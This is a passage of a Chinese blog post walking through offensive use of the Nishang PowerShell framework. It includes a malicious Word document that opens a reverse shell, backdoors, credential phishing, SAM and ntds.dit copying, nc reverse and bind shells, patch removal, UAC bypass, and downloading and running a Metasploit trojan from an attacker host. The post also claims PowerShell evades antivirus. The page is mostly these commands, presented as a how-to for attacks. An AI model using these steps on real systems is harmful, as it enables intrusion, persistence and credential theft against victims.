接着制作word文件，打开\nishang\Shell\Invoke-PowerShellTcpOneLine.ps1文件，复制第三行的内容，可以看到有一个`TcpClient`的参数，这就是远程连接的地址，把他改为本机的IP和你监听的端口，改完以后复制代码，在命令行下如下执行
Invoke-Encode -DataToEncode '复制的代码' -IsString -PostScript
执行完之后会在当前目录生成两个文件，一个是encode.txt， 一个是encodedcommand.txt
接着执行命令
Out-Word-PayloadScript .\encodedcommand.txt
会生成一个word文档，用户打开就中招，我们获取到反弹的powershell



##  后门

1.Http-Backdoor
可以帮助我们在目标机器上下载和执行powershell脚本，接收来自第三方网站的制定，然后在内存中执行powershell脚本

2.Add-ScrnSaveBackdoor
利用windows的屏保来留下一个隐藏的后门

3.Execute-OnTime
与Http-Backdoor相比，多了定时功能

4.Invoke-ADSBackdoor
使用NTFS数据流留下的一个永久后门
最恐怖的后门





## 钓鱼攻击(有道用户输入自己机器的密码)

Invoke-CredentialsPhish


## webshell后门   位于 \nishang\Antak-WebShell目录下

就是一个asp的大马（使用的是powershell的命令，比cmd命令强大）



# 复制sam文件（如果运行在DC机上，ntds.dit和SYSTEM hive也能被拷贝出来）

Copy-VSS    # 直接把文件保存在当前路径下
Copy-VSS -DEstinationDir C:temp    # 制定文件保存路径（必须是已存在的路径）

## 其他......
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="后续控制"><a href="#后续控制" class="headerlink" title="后续控制"></a>后续控制</h6><pre class="line-numbers language-python"><code class="language-python"><span class="token comment" spellcheck="true"># windows上没有nc，需要提前上传一个nc.exe，推荐Linux</span>

<span class="token comment" spellcheck="true">## No1.反向连接（我用公网来连接目标内网，因为我获取不到内网的公网ip）  在Shells目录下面</span>

<span class="token comment" spellcheck="true">#1.攻击机器上 NC下执行: </span>
nc <span class="token operator">-</span>lvp <span class="token number">3333</span>
<span class="token comment" spellcheck="true">#2.在目标服务器 PowerShell下执行：  TCO的</span>
Invoke<span class="token operator">-</span>PowerShellTcp <span class="token operator">-</span>Reverse <span class="token operator">-</span>IPAddress <span class="token number">192.168</span><span class="token punctuation">.</span><span class="token number">0.103</span> <span class="token operator">-</span>Port <span class="token number">3333</span>



<span class="token comment" spellcheck="true">## NO2.正向连接:</span>

<span class="token comment" spellcheck="true">#1.目标 PowerShell下执行:  TCP的，  另外还有UDP的: </span>
Invoke<span class="token operator">-</span>PowerShellTcp <span class="token operator">-</span>Bind <span class="token operator">-</span>Port <span class="token number">3333</span>
<span class="token comment" spellcheck="true">#NC下执行: 请求他的3333端口</span>
nc <span class="token operator">-</span>nv <span class="token number">192.168</span><span class="token punctuation">.</span><span class="token number">0.103</span> <span class="token number">3333</span>


<span class="token comment" spellcheck="true">### 基于UDP( Invoke-PowerShellUdp )，  nc命令有点不同</span>

正向连接
nc <span class="token operator">-</span>nvu <span class="token number">192.168</span><span class="token punctuation">.</span><span class="token number">0.103</span> <span class="token number">3333</span>
反向连接
nc lup <span class="token number">3333</span>

<span class="token comment" spellcheck="true">### 基于http和https  （ Invoke-PoshRatHttp ）</span>

<span class="token comment" spellcheck="true">### 此外,还有http的shell(执行完会生成一条命令，然后???)</span>

Invoke<span class="token operator">-</span>PoshRatHttp <span class="token operator">-</span>Reverse <span class="token operator">-</span>IPAddress <span class="token number">192.168</span><span class="token punctuation">.</span><span class="token number">0.103</span> <span class="token operator">-</span>Port <span class="token number">3333</span>
Invoke<span class="token operator">-</span>PoshRatHttps <span class="token operator">-</span>Reverse <span class="token operator">-</span>IPAddress <span class="token number">192.168</span><span class="token punctuation">.</span><span class="token number">0.103</span> <span class="token operator">-</span>Port <span class="token number">3333</span>

<span class="token comment" spellcheck="true"># 然后将生成的命令复制到`目标机`cmd执行，执行完毕会自动消失，然后在本机的powershell下会返回目标机的会话</span>


<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="域渗透"><a href="#域渗透" class="headerlink" title="域渗透"></a>域渗透</h6><p>在nishang目录下面的ActiveDirectory下面</p>
<p><strong>疑难杂症</strong><br>1.真实案例分析</p>
<pre class="line-numbers language-python"><code class="language-python">
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>2.各种安全限制</p>
<pre class="line-numbers language-python"><code class="language-python">无解析

无权限

无执行
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="系统提权"><a href="#系统提权" class="headerlink" title="系统提权"></a>系统提权</h6><ul>
<li>基于数据库</li>
<li>基于漏洞（常用，如果电脑没补丁，可以删除补丁）</li>
<li>第三方软件</li>
</ul>
<pre class="line-numbers language-python"><code class="language-python"><span class="token comment" spellcheck="true"># 查看系统的补丁</span>
systeminfo

<span class="token comment" spellcheck="true"># 删除补丁</span>
Remove<span class="token operator">-</span>Update   <span class="token comment" spellcheck="true"># 然后输入补丁编号</span>

<span class="token comment" spellcheck="true"># 删除全部补丁</span>
Remove<span class="token operator">-</span>Update All

<span class="token comment" spellcheck="true"># 删除全部的安全补丁</span>
Remove<span class="token operator">-</span>Update Security

<span class="token comment" spellcheck="true"># 删除指定的补丁</span>
Remove<span class="token operator">-</span>Update KB2761226



<span class="token comment" spellcheck="true">#### Bypass  UAC    :   模块:Invoke-PsUACme</span>
UAC <span class="token punctuation">(</span>用户账户控制<span class="token punctuation">)</span>
Get<span class="token operator">-</span>Help  获取帮助

<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="powershell下载文件-nishang"><a href="#powershell下载文件-nishang" class="headerlink" title="powershell下载文件(nishang)"></a>powershell下载文件(nishang)</h6><pre class="line-numbers language-python"><code class="language-python">$client <span class="token operator">=</span> new<span class="token operator">-</span>object System<span class="token punctuation">.</span>Net<span class="token punctuation">.</span>WebClient
$client<span class="token punctuation">.</span>DownloadFile<span class="token punctuation">(</span><span class="token string">'#1'</span><span class="token punctuation">,</span> <span class="token string">'#2'</span><span class="token punctuation">)</span>
<span class="token comment" spellcheck="true">#1是需要下载文件的url</span>
<span class="token comment" spellcheck="true">#2是保存为本地文件的路径，包括文件名</span>
例如：
$client<span class="token punctuation">.</span>DownloadFile<span class="token punctuation">(</span><span class="token string">'https://www.2cto.com/net/201611/562900.html'</span><span class="token punctuation">,</span> <span class="token string">'D:/562900.html'</span><span class="token punctuation">)</span>


<span class="token comment" spellcheck="true"># 或者这个方法</span>

$src <span class="token operator">=</span> <span class="token string">'https://www.pstips.net/index.php'</span>
$des <span class="token operator">=</span> <span class="token string">"$env:temp\index.php"</span>
Invoke<span class="token operator">-</span>WebRequest <span class="token operator">-</span>uri $src <span class="token operator">-</span>OutFile $des
Unblock<span class="token operator">-</span>File $des


<span class="token comment" spellcheck="true"># 下载完之后就可以用啦</span>


<span class="token comment" spellcheck="true">## 下载执行       Download_Execute</span>

下载文本文件，然后转换为可执行文件执行

利用exetotext<span class="token punctuation">.</span>ps1把msf生成的木马端`msf<span class="token punctuation">.</span>exe`更改为`msf<span class="token punctuation">.</span>txt`文件
ExetoTxt c<span class="token punctuation">:</span>msf<span class="token punctuation">.</span>exe  c<span class="token punctuation">:</span>msf<span class="token punctuation">.</span>txt

然后输入以下命令，调用`Download Execute`脚本下载并执行该文件
Download Execute http<span class="token punctuation">:</span><span class="token operator">//</span><span class="token number">192.168</span><span class="token punctuation">.</span><span class="token number">110.128</span><span class="token operator">/</span>msf<span class="token punctuation">.</span>txt

这时，msf的监听端就会成功获得反弹回来的shell
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<blockquote>
<p>powershell是没有杀毒软件提示的</p>
</blockquote>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://www.xpshuai.cn" rel="external nofollow noreferrer">剑胆琴心</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://www.xpshuai.cn/posts/27104/">http://www.xpshuai.cn/posts/27104/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="http://www.xpshuai.cn" target="_blank">剑胆琴心</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/内网/">
                                    <span class="chip bg-color">内网</span>
                                </a>
                            
                                <a href="/tags/渗透/">
                                    <span class="chip bg-color">渗透</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">如果感觉对您有帮助，请我吃包辣条吧</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    
        <link rel="stylesheet" href="/libs/gitalk/gitalk.css">
<link rel="stylesheet" href="/css/my-gitalk.css">

<div class="card gitalk-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="gitalk-container" class="card-content"></div>
</div>

<script src="/libs/gitalk/gitalk.min.js"></script>
<script>
    let gitalk = new Gitalk({
        clientID: 'd75ec1a5864747376f6f',
        clientSecret: 'b4751152ca815e8e538c64da23e2a371fa1fb2db',
        repo: 'hexo-gitalk',
        owner: 'shuai06',
        admin: "shuai06",
        id: '2020-03-05T12-23-24',
        distractionFreeMode: false  // Facebook-like distraction free mode
    });

    gitalk.render('gitalk-container');
</script>

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/posts/9091/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/16.jpg" class="responsive-img" alt="ubuntu server-网络相关知识">
                        
                        <span class="card-title">ubuntu server-网络相关知识</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            网络原理
ping 127.0.0.1 如果能通，说明本机的TCP/IP协议已经配置成功啦arping
网卡配置网卡接口-enp2s0 (最近使用)、eth0   （以前这么使用）
#wl 开头的是无线网卡

# ifconfig 命令
#
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2020-03-08
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Linux/" class="post-category">
                                    Linux
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Linux/">
                        <span class="chip bg-color">Linux</span>
                    </a>
                    
                    <a href="/tags/ubuntu/">
                        <span class="chip bg-color">ubuntu</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/posts/50980/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/4.jpg" class="responsive-img" alt="scrcpy-手机与电脑投屏神器">
                        
                        <span class="card-title">scrcpy-手机与电脑投屏神器</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            scrcpy 安装snap install scrcpy
adb服务安装sudo apt-get install android-tools-adb
adb配置手机通过USB连接电脑lsusb
找到自己手机的识别号,(可以对比数据线插入之前
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-02-24
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/工具/" class="post-category">
                                    工具
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/工具/">
                        <span class="chip bg-color">工具</span>
                    </a>
                    
                    <a href="/tags/scrcpy/">
                        <span class="chip bg-color">scrcpy</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('120')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: 剑胆琴心<br />'
            + '文章作者: 剑胆琴心<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('1'),
            headingSelector: 'h1, h2, h3, h4, h5, h6'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4, h5, h6').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2019</span>
            <a href="http://www.xpshuai.cn" target="_blank">剑胆琴心</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">371.1k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2019";
                    var startMonth = "4";
                    var startDate = "20";
                    var startHour = "15";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
            <span id="icp"><img src="/medias/icp.png" style="vertical-align: text-bottom;" />
                <a href="http://www.beianbeian.com/beianxinxi/816345dfd53e0153acde20c5bb1dd1b0.html" target="_blank">冀ICP备18027796号-1</a>
            </span>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/shuai06" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:2944282625@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=2944282625" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 2944282625" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/search.xml", 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    
        <script src="//code.tidio.co/xfg3rji2iq4povfdtfxiwk4smqduoso6.js"></script>
        <script>
            $(document).ready(function () {
                setInterval(change_Tidio, 50);
                function change_Tidio() {
                    var tidio=$("#tidio-chat iframe");
                    if(tidio.css("display")=="block"&& $(window).width()>977 ){
                        document.getElementById("tidio-chat-iframe").style.bottom= ($("div#backTop.top-scroll").css("display")=="none" &&$(window).width()>977)>0? "-40px" : ($("div.toc-title").length&&$(window).width()>977)>0?"85px":"20px";
                        document.getElementById("tidio-chat-iframe").style.right="-15px";
                        document.getElementById("tidio-chat-iframe").style.height=parseInt(tidio.css("height"))>=520?"520px":tidio.css("height");
                        document.getElementById("tidio-chat-iframe").style.zIndex="997";
                    }
                    else if(tidio.css("display")=="block"&&$(window).width()>601 &&$(window).width()<992 ){
                        document.getElementById("tidio-chat-iframe").style.bottom= ($("div#backTop.top-scroll").css("display")=="none" && 601< $(window).width()<992)>0? "-40px":"20px" ;
                        document.getElementById("tidio-chat-iframe").style.right="-15px";
                        document.getElementById("tidio-chat-iframe").style.zIndex="997";
                    }
                    else if(tidio.css("display")=="block"&&$(window).width()<601 && parseInt(tidio.css("height"))<230){
                        document.getElementById("tidio-chat-iframe").style.bottom= ($("div#backTop.top-scroll").css("display")=="none" && $(window).width()<601)>0? "-10px":"45px" ;
                        document.getElementById("tidio-chat-iframe").style.zIndex="997";
                    }
                    if( tidio.css("display")=="block"&&$(window).width()<601 && parseInt(tidio.css("height"))>=230){
                        document.getElementById("tidio-chat-iframe").style.zIndex="998";
                    }
                }
            });
        </script>
    

    

    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
